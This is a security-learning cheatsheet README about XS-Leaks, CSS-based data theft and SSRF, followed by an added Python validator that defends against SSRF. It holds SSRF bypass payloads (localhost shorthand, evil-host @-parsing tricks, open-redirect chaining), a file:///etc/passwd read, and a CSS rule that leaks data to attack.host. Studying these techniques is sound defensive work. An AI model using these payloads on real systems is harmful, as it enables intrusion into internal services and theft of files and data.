shinmao/SecurityLearning

Security Learning

Cheatsheet, Links, Enjoy it ☕️

Topic                       Description
How to take good practice   learn security, read source code...
WASM                        Web Assembly
Frontend                    Browser knowledge
XSS                         XSS
SSRF                        SSRF

How to take a good practice

WASM

Frontend

XSS

XS-Leaks

Like XSS, this is a technique for stealing information across origins, but because it is constrained by the SOP the information is not returned directly. Instead it works like a blind injection: brute-force the value while observing the browser's behaviour (how does the page behave differently when a guess is right versus wrong?). How can browser behaviour be observed cross-origin? Certain information does cross origins: the iframe count, for example, is not restricted by the SOP, and the 35c3 filemanager challenge above used the number of onload events together with the XSS Auditor to brute-force the flag cross-origin.

Steal data with CSS

Inject CSS into the page and use attribute selectors; when a selector matches, the rule issues a specific request ({background:url("https://attack.host/aa");}) to the attacker's own server, leaking the matched information.

SSRF

Find server's API which will send request

Bypass IP, URL limit

127.0.0.1
127.0.1
127.1
0.0.0.0   // linux
0.0
0
127.0.0.1.xip.io
0x7f000001
2130706433
017700000001
ⓛⓞⓒⓐⓛⓗⓞⓢⓣ   // enclosed alphanumerics
[::]
// append a port to bypass an IP-segment check
127.0.0.1:80

// intranet
10.0.0.0/8   // 10.0.0.0 ~ 10.255.255.255
172.16.0.0/12   // 172.16.0.0 ~ 172.31.255.255
192.168.0.0/16  // 192.168.0.0 ~ 192.168.255.255
127.0.0.0/8
0.0.0.0/8
  • Obfuscation: double URL-encoding
  • According to RFC 3986
    the authority component is preceded by a double slash and terminated by the next slash, ?, #, or the end of the URL.
    check whether the URL parser accepts @ (embedded credentials, the userinfo part); combine the following payloads with obfuscation
    • evil-host#@expected-host
    • expected-host#@evil-host:evil-port:expected-port
    • expected-host@evil-host
    • evil-host#expected-host

Match rules:

// php
parse_url():
host: the host after the last @

// libcurl
host: the host after the first @

302 Redirect bypass

The server validates the URL only once and does not re-check the target after a redirect
find an open redirect, e.g. http://aaa.com/a?req=/b
pass it to an API endpoint the server already trusts, e.g. api=http://aaa.com/a?req=evil-host
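The IP shorthand list, the @ parsing rules and the redirect item above all describe the same defender's problem: the string the validator looks at is not the address the HTTP client connects to. The example below is added here and is not part of the original cheatsheet; it is a Python validator that canonicalizes the host the way inet_aton does (decimal, octal and hex shorthand), NFKC-folds enclosed alphanumerics, strips IPv6 brackets, and only then compares against the intranet ranges listed above. Function names, the LOCAL_NAMES set, the extra link-local/unspecified flags and the sample URLs are the example's own choices, not from the page.

```python
import ipaddress
import re
import unicodedata
from urllib.parse import urlsplit

# Ranges taken from the cheatsheet above; ipaddress flags below add link-local etc.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/8",
)]
LOCAL_NAMES = {"localhost"}  # assumption: names that must never be fetched

# inet_aton grammar for one dotted part: 0x.. hex, leading-0 octal, otherwise decimal
_PART = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")


def canonical_ipv4(host):
    """Expand inet_aton shorthand ("127.1", "0x7f000001", "2130706433",
    "017700000001") to a dotted quad; None if host is not an IPv4 literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.fullmatch(p) for p in parts):
        return None
    values = [int(p, 16) if p[:2].lower() == "0x" else int(p, 8) if p.startswith("0") else int(p)
              for p in parts]
    # every part but the last is one octet; the last part fills the remaining bits
    widths = [8] * (len(values) - 1) + [32 - 8 * (len(values) - 1)]
    addr = 0
    for value, width in zip(values, widths):
        if value >= 1 << width:
            return None
        addr = (addr << width) | value
    return str(ipaddress.IPv4Address(addr))


def canonical_host(url):
    """Return (host, ip): host is the parser's hostname after NFKC folding,
    ip is an ipaddress object for a literal or None for a DNS name."""
    try:
        # urlsplit takes the host after the LAST '@' (like PHP parse_url);
        # the fetcher must use the same parser, or the two can disagree.
        host = urlsplit(url).hostname
    except ValueError:
        return None, None
    if host is None:
        return None, None
    host = unicodedata.normalize("NFKC", host).lower()  # ⓛⓞⓒⓐⓛⓗⓞⓢⓣ -> localhost
    dotted = canonical_ipv4(host)
    if dotted is not None:
        return host, ipaddress.ip_address(dotted)
    try:
        return host, ipaddress.ip_address(host)  # IPv6 literal, e.g. "::" from "[::]"
    except ValueError:
        return host, None


def is_internal(ip):
    """True for any address the server must not talk to on a user's behalf."""
    return (ip.is_private or ip.is_loopback or ip.is_unspecified or ip.is_link_local
            or any(ip in net for net in BLOCKED_NETWORKS))


def check_url(url):
    """'block', 'allow', or 'resolve'. 'resolve' means a DNS name survived the
    string checks: resolve it, run is_internal() on every answer, and connect to
    that same address (a name such as 127.0.0.1.xip.io is only caught here)."""
    host, ip = canonical_host(url)
    if host is None or host in LOCAL_NAMES:
        return "block"
    if ip is None:
        return "resolve"
    return "block" if is_internal(ip) else "allow"


if __name__ == "__main__":
    # constructed sample inputs built from the shorthand forms listed above
    for sample in ("http://127.1/", "http://0x7f000001/", "http://[::]/",
                   "http://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ/", "http://127.0.0.1.xip.io/",
                   "http://expected-host@evil-host/", "http://11.22.33.44/"):
        print(f"{sample:40} {check_url(sample)}")
```

The same check_url() has to run again on every Location header when following a redirect (turn off the client's automatic redirects), otherwise the 302 trick above still works. An allow-list of permitted destinations is the stronger design; the deny-list is shown because that is what the cheatsheet enumerates.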

Protocol

  • dict://<user-auth>@<host>:<port>/
  • sftp://
  • file://
    file:///etc/passwd
    // the two slashes right after file: are part of the scheme separator
    // the third slash is the root directory
    file://domain/etc/passwd
  • tftp://
  • ldap://
  • gopher://
    Using the Gopher protocol to extend the attack surface

Blind-SSRF

Some more challenges?

  • What if only part of the URL is controlled?

Tool

Reference